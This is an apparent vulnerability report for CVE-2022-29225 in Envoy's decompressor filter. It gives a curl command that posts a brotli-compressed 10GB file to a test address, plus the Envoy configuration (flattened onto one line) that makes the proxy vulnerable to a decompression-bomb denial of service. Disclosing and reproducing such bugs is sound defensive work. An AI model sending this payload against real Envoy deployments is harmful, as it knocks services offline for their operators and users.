CVE-2022-29225 envoy：解压器可以执行拒绝服务攻击

repro command 'curl -v http://10.0.0.1:10000/ -H "Content-Encoding: br" -H "Expect:" --data-binary @/mnt/c/temp/10GB.html.br`config:static_resources: listeners: - address: socket_address: address: 0.0.0.0 port_value: 10000 filter_chains: - filters: - name: envoy.filters.network.http_connection_manager typed_config: "@type": type.googleapis.com/envoy.extensions.filters.network.http_connection_manager.v3.HttpConnection Manager path_with_escaped_slashes_action: UNESCAPE_AND_FORWARD merge_slashes: true codec_type: AUTO strip_trailing_host_dot: true strip_any_host_port: true stat_prefix: ingress_http route_config: name: local_route virtual_hosts: - name: app domains: - "*" routes: - match: prefix: "/" route: cluster: service-http http_filters: - name: decompressor typed_config: "@type": type.googleapis.com/envoy.extensions.filters.http.decompressor.v3.Decompressor decompressor_library: name: basic typed_config: "@type": type.googleapis.com/envoy.extensions.compression.brotli.decompressor.v3.Brotli - name: envoy.filters.http.router clusters:- name: service-http type: STRICT_DNS lb_policy: ROUND_ROBIN load_assignment: cluster_name: service-http endpoints: - lb_endpoints: - endpoint: address: socket_address: address: 127.0.0.1 port_value: 4567 - lb_endpoints: - endpoint: address: socket_address: address: 127.0.0.1 port_value: 4568 Description (full; not included in CVE but will be published on GitHub later and linked)